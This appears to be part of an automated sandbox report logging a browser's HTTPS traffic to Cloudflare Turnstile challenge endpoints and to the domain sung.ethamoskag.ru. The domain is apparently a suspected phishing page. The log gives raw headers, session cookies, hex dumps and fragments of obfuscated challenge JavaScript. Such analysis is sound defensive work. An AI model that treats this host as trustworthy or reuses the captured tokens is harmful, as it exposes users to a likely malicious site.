                                                                Data Ascii: ase'3':d[iR(960)](0,H)&&(H=j,G=d[iR(306)](o,I++));continue;case'4':J|=d[iR(1470)](d[iR(1625)](0,N)?1:0,F);continue}break}switch(J){case 0:for(J=0,K=Math[iR(723)](2,8),F=1;d[iR(387)](F,K);N=d[iR(1036)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=(0<N?1:0)*F,F<<=1);


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.1649733104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:04 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:04 UTC240INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:04 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                cache-control: max-age=2629800, public
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714cb2ea48cbd-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:04 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.1649723172.67.206.1144437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:04 UTC1323OUTGET /favicon.ico HTTP/1.1
                                                                Host: sung.ethamoskag.ru
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://sung.ethamoskag.ru/0cUrcw3/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: XSRF-TOKEN=eyJpdiI6InVnRlMyak5RQzhaaXN4ZGpIOWJnVVE9PSIsInZhbHVlIjoiN1lqdW5LenhEbTVENFBHeGgvK1lMVUVlb1k1SGZtaEMwanhlV096Y0lDR2cyek9KTEQrbmJwVGttVUFYWFNUek1CTWdhR29nTkNPN3pJcllIRTgxV0xZN01aakJWaTlPWlM1TEo3bkZ5bnY5ZUtBcmdRUUxRN1p3Y0MwY0M4Q1EiLCJtYWMiOiI2MWQ2Yjg0NTI1YjE2ZjBmYjNmMGJiNDI2Y2E1YTI2ZDlhN2Q1ZWQzYzZiZDQ2OTE1NmU3OGRkNDgxZTkxYjMxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFTMXc1cjJMOTB6VEVPVW13aHQrZFE9PSIsInZhbHVlIjoiMWh0WldJalVvWWlOeklCSyszL2JDZlFRdWJRUFFWY3BISWNieHltM2xvMTl2bjR1QTBxcFd6V0NqTWEya2J6emZtSzdCMmZCeklBY2I1ZXhCblREZC91eWJuVWtUaUxJYVBhZnY1ZHVxcURBV2NOYlEvVXIvQXlJaFM2cG1TM3YiLCJtYWMiOiI0ODA3ZmY3ZTRiMDc1OGQyZjEwN2Y4NmIwM2Q0N2E3ZWI4ZjdjM2QxMjkyNDI4Zjk3NTU2ZDg0MGQxN2Y3OTIwIiwidGFnIjoiIn0%3D
                                                                2025-01-07 21:36:05 UTC1057INHTTP/1.1 404 Not Found
                                                                Date: Tue, 07 Jan 2025 21:36:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Cache-Control: max-age=14400
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iiKpM3n5M0fDNFnrDcDsMdQtkaIjKmToRccg3viDHjNqN2XOzqX88%2FevpVitsfcfzvfW4rw3Mj8Ssv5w8%2FulVhzXQNf5iKkZCM0tl4XQVNCBSNUBj3pu56sR4ZbU3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=934&min_rtt=893&rtt_var=273&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2237&delivery_rate=4320512&cwnd=253&unsent_bytes=0&cid=9c5e543b4d29492b&ts=449&x=0"
                                                                CF-Cache-Status: EXPIRED
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714cd1f4a42bb-EWR
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1804&rtt_var=685&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1901&delivery_rate=1588683&cwnd=193&unsent_bytes=0&cid=0679275d2c48b8f6&ts=5463&x=0"
                                                                2025-01-07 21:36:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.1649734104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:04 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:05 UTC240INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:05 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                cache-control: max-age=2629800, public
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714cefab00c7e-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:05 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.1649735104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:05 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe714c69d748c29&lang=auto HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:05 UTC331INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:05 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 114960
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714d04f2543eb-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:05 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70
                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"http
                                                                2025-01-07 21:36:05 UTC1369INData Raw: 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                Data Ascii: ser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                2025-01-07 21:36:05 UTC1369INData Raw: 67 62 2c 67 6c 2c 67 77 2c 67 41 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 37 31 36 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 38 31 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 38 33 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 35 31 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 39 33 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 32 34 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 33 34 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 33 37
                                                                Data Ascii: gb,gl,gw,gA,gB,gC,gG,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(716))/1+parseInt(gI(581))/2*(-parseInt(gI(483))/3)+-parseInt(gI(1551))/4+-parseInt(gI(1393))/5+parseInt(gI(624))/6+parseInt(gI(434))/7+-parseInt(gI(1537
                                                                2025-01-07 21:36:05 UTC1369INData Raw: 68 28 69 29 7d 2c 27 63 6c 75 44 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 56 46 7a 42 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 55 53 72 77 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 66 45 67 44 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 73 6b 4d 77 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 59 70 51 4f 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 78 4b 63 76 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 49 79 6e 51 77
                                                                Data Ascii: h(i)},'cluDr':function(h,i){return h<<i},'VFzBE':function(h,i){return i==h},'USrwG':function(h,i){return h-i},'fEgDd':function(h,i){return h>i},'skMww':function(h,i){return h<<i},'YpQOe':function(h,i){return h==i},'xKcvm':function(h,i){return i==h},'IynQw
                                                                2025-01-07 21:36:05 UTC1369INData Raw: 5d 3b 4d 2b 3d 31 29 69 66 28 4e 3d 6a 5b 68 77 28 31 33 38 38 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 68 77 28 31 34 31 39 29 5d 5b 68 77 28 36 35 36 29 5d 5b 68 77 28 35 38 36 29 5d 28 44 2c 4e 29 7c 7c 28 44 5b 4e 5d 3d 48 2b 2b 2c 45 5b 4e 5d 3d 21 30 29 2c 4f 3d 46 2b 4e 2c 4f 62 6a 65 63 74 5b 68 77 28 31 34 31 39 29 5d 5b 68 77 28 36 35 36 29 5d 5b 68 77 28 35 38 36 29 5d 28 44 2c 4f 29 29 46 3d 4f 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 68 77 28 31 34 31 39 29 5d 5b 68 77 28 36 35 36 29 5d 5b 68 77 28 35 38 36 29 5d 28 45 2c 46 29 29 7b 69 66 28 64 5b 68 77 28 38 35 34 29 5d 28 32 35 36 2c 46 5b 68 77 28 37 32 38 29 5d 28 30 29 29 29 7b 69 66 28 64 5b 68 77 28 39 30 30 29 5d 28 64 5b 68 77 28 31 33 31 38 29 5d 2c 64 5b 68 77 28 31 36 31 37
                                                                Data Ascii: ];M+=1)if(N=j[hw(1388)](M),Object[hw(1419)][hw(656)][hw(586)](D,N)||(D[N]=H++,E[N]=!0),O=F+N,Object[hw(1419)][hw(656)][hw(586)](D,O))F=O;else{if(Object[hw(1419)][hw(656)][hw(586)](E,F)){if(d[hw(854)](256,F[hw(728)](0))){if(d[hw(900)](d[hw(1318)],d[hw(1617
                                                                2025-01-07 21:36:05 UTC1369INData Raw: 31 30 39 37 29 5d 5b 68 77 28 31 30 32 37 29 5d 2c 53 5b 68 77 28 31 32 38 33 29 5d 3d 68 77 28 33 30 32 29 2c 53 5b 68 77 28 35 30 35 29 5d 3d 4b 5b 68 77 28 31 30 39 37 29 5d 5b 68 77 28 34 32 30 29 5d 2c 47 5b 42 5b 68 77 28 36 34 37 29 5d 5d 5b 68 77 28 31 36 30 30 29 5d 28 53 2c 27 2a 27 29 29 3b 65 6c 73 65 7b 66 6f 72 28 43 3d 30 3b 64 5b 68 77 28 31 30 35 32 29 5d 28 43 2c 49 29 3b 4b 3c 3c 3d 31 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 68 77 28 31 33 34 37 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 68 77 28 37 32 38 29 5d 28 30 29 2c 43 3d 30 3b 38 3e 43 3b 4b 3d 64 5b 68 77 28 34 33 35 29 5d 28 4b 2c 31 29 7c 31 26 50 2c 4c 3d 3d 64 5b 68 77 28 37 37 37 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c
                                                                Data Ascii: 1097)][hw(1027)],S[hw(1283)]=hw(302),S[hw(505)]=K[hw(1097)][hw(420)],G[B[hw(647)]][hw(1600)](S,'*'));else{for(C=0;d[hw(1052)](C,I);K<<=1,o-1==L?(L=0,J[hw(1347)](s(K)),K=0):L++,C++);for(P=F[hw(728)](0),C=0;8>C;K=d[hw(435)](K,1)|1&P,L==d[hw(777)](o,1)?(L=0,
                                                                2025-01-07 21:36:05 UTC1369INData Raw: 6e 75 65 3b 63 61 73 65 27 31 27 3a 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 4a 7c 3d 64 5b 68 7a 28 33 32 38 29 5d 28 30 3c 4e 3f 31 3a 30 2c 46 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 46 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 48 3e 3e 3d 31 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 7a 28 36 32 35 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 68 7a 28 31 32 39 31 29 5d 28 46 2c 4b 29 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 7a 28 33 32 38 29 5d 28 64 5b 68 7a 28
                                                                Data Ascii: nue;case'1':0==H&&(H=j,G=o(I++));continue;case'2':J|=d[hz(328)](0<N?1:0,F);continue;case'3':F<<=1;continue;case'4':H>>=1;continue}break}switch(J){case 0:for(J=0,K=Math[hz(625)](2,8),F=1;d[hz(1291)](F,K);N=G&H,H>>=1,0==H&&(H=j,G=o(I++)),J|=d[hz(328)](d[hz(
                                                                2025-01-07 21:36:05 UTC1369INData Raw: 54 69 6d 65 6f 75 74 28 66 76 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 66 76 2c 30 29 2c 65 4d 5b 67 4a 28 31 31 31 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 34 2c 64 2c 65 2c 66 2c 67 29 7b 69 34 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 69 34 28 36 38 33 29 5d 3d 69 34 28 33 30 32 29 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 69 34 28 33 35 39 29 5d 5b 69 34 28 38 35 36 29 5d 28 32 2e 32 31 3c 3c 66 2c 33 32 29 2c 65 4d 5b 69 34 28 31 32 31 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 35 29 7b 69 35 3d 69 34 2c 65 4d 5b 69 35 28 31 31 30 31 29 5d 26 26 28 65 4d 5b 69 35 28 31 36 31 38 29 5d 5b 69 35 28 31 36 32 38 29 5d 28 29 2c 65 4d 5b 69 35 28 31 36 31 38 29 5d 5b 69 35 28 31 37 30 36 29 5d 28 29 2c 65 4d 5b 69 35 28 31 33 38 39 29 5d 3d 21
                                                                Data Ascii: Timeout(fv,0)}):setTimeout(fv,0),eM[gJ(1110)]=function(i4,d,e,f,g){i4=gJ,d={},d[i4(683)]=i4(302),e=d,f=1,g=1e3*eM[i4(359)][i4(856)](2.21<<f,32),eM[i4(1213)](function(i5){i5=i4,eM[i5(1101)]&&(eM[i5(1618)][i5(1628)](),eM[i5(1618)][i5(1706)](),eM[i5(1389)]=!
                                                                2025-01-07 21:36:05 UTC1369INData Raw: 65 4d 5b 28 69 36 28 31 32 35 35 29 29 5d 28 29 2c 21 73 29 72 65 74 75 72 6e 3b 78 3d 69 36 28 33 38 34 29 2c 73 5b 69 36 28 36 39 33 29 5d 28 78 2c 6d 2c 21 21 5b 5d 29 2c 73 5b 69 36 28 31 34 35 35 29 5d 3d 35 65 33 2c 73 5b 69 36 28 36 36 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 73 5b 69 36 28 35 33 31 29 5d 28 69 36 28 31 36 31 39 29 2c 69 36 28 36 37 31 29 29 2c 42 3d 7b 7d 2c 42 5b 69 36 28 31 35 30 37 29 5d 3d 66 2c 42 5b 69 36 28 34 34 34 29 5d 3d 6a 2c 42 2e 63 63 3d 67 2c 42 5b 69 36 28 31 36 34 38 29 5d 3d 6b 2c 42 5b 69 36 28 31 36 31 30 29 5d 3d 6f 2c 43 3d 4a 53 4f 4e 5b 69 36 28 37 38 33 29 5d 28 42 29 2c 44 3d 66 6c 5b 69 36 28 31 33 37 32 29 5d 28 43 29 5b 69 36 28 31 35 37 34 29 5d 28 27 2b 27 2c 69 36 28 31 36 30 34 29 29 2c
                                                                Data Ascii: eM[(i6(1255))](),!s)return;x=i6(384),s[i6(693)](x,m,!![]),s[i6(1455)]=5e3,s[i6(666)]=function(){},s[i6(531)](i6(1619),i6(671)),B={},B[i6(1507)]=f,B[i6(444)]=j,B.cc=g,B[i6(1648)]=k,B[i6(1610)]=o,C=JSON[i6(783)](B),D=fl[i6(1372)](C)[i6(1574)]('+',i6(1604)),
                                                                2025-01-07 21:36:05 UTC1369INData Raw: 37 29 5d 5b 67 4a 28 31 37 32 39 29 5d 5b 67 4a 28 34 39 37 29 5d 2c 66 52 3d 21 5b 5d 2c 67 33 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 35 35 39 29 5d 28 67 4a 28 36 38 34 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 69 58 2c 64 2c 65 29 7b 69 58 3d 67 4a 2c 64 3d 7b 27 43 48 5a 52 55 27 3a 69 58 28 31 35 34 30 29 2c 27 57 5a 55 76 7a 27 3a 69 58 28 31 36 39 38 29 2c 27 57 4a 4d 75 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 21 3d 3d 66 7d 2c 27 77 59 47 41 65 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 4c 4d 78 45 4e 27 3a 69 58 28 39 37 39 29 2c 27 6b 58 5a 76 41 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3d 3d 3d 67 7d 2c 27 48 5a 66 6f 64 27 3a 66 75
                                                                Data Ascii: 7)][gJ(1729)][gJ(497)],fR=![],g3=undefined,eM[gJ(559)](gJ(684),function(c,iX,d,e){iX=gJ,d={'CHZRU':iX(1540),'WZUvz':iX(1698),'WJMuK':function(f,g){return g!==f},'wYGAe':function(f){return f()},'LMxEN':iX(979),'kXZvA':function(f,g){return f===g},'HZfod':fu


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.164973635.190.80.14437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:05 UTC535OUTOPTIONS /report/v4?s=iiKpM3n5M0fDNFnrDcDsMdQtkaIjKmToRccg3viDHjNqN2XOzqX88%2FevpVitsfcfzvfW4rw3Mj8Ssv5w8%2FulVhzXQNf5iKkZCM0tl4XQVNCBSNUBj3pu56sR4ZbU3w%3D%3D HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Origin: https://sung.ethamoskag.ru
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: content-type
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:05 UTC336INHTTP/1.1 200 OK
                                                                Content-Length: 0
                                                                access-control-max-age: 86400
                                                                access-control-allow-methods: POST, OPTIONS
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: content-type, content-length
                                                                date: Tue, 07 Jan 2025 21:36:05 GMT
                                                                Via: 1.1 google
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.1649737104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:06 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1702680241:1736281743:oHkGzRQEm0XBvPLraYKhN6D7o1wYu-qyAvxbR8tTHnY/8fe714c69d748c29/D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 3166
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Content-type: application/x-www-form-urlencoded
                                                                CF-Chl-RetryAttempt: 0
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                CF-Challenge: D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://challenges.cloudflare.com
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:06 UTC3166OUTData Raw: 76 5f 38 66 65 37 31 34 63 36 39 64 37 34 38 63 32 39 3d 38 69 37 79 65 79 55 79 73 79 5a 79 75 70 48 49 70 48 74 79 70 64 77 4b 6c 68 70 4f 48 6c 51 43 48 2d 74 48 57 35 36 57 49 62 6c 48 77 64 6c 4b 32 36 62 55 48 74 48 37 64 70 4c 57 6b 48 6f 36 48 4b 32 6a 4c 79 4f 32 48 4d 79 70 32 4c 70 66 4e 44 57 4c 48 72 79 4e 4e 50 48 6e 36 48 73 6e 48 37 74 25 32 62 48 78 48 62 59 55 48 62 64 70 2b 69 79 62 54 54 32 61 79 4f 64 57 6d 7a 64 69 4c 48 6d 48 4e 74 4d 69 46 56 53 76 4e 57 47 66 78 54 71 55 66 36 57 38 38 4e 51 4f 59 4e 68 4d 6d 4f 73 49 44 75 68 4d 54 50 4b 36 36 75 38 74 6f 6e 78 4f 6d 48 57 74 4b 74 74 58 34 48 48 76 43 79 48 44 44 55 74 6a 4e 72 68 34 4c 36 48 4a 48 70 68 48 6d 36 57 62 6c 36 48 58 48 4f 4c 69 79 4f 73 71 70 58 6f 33 48 6c 51 4c
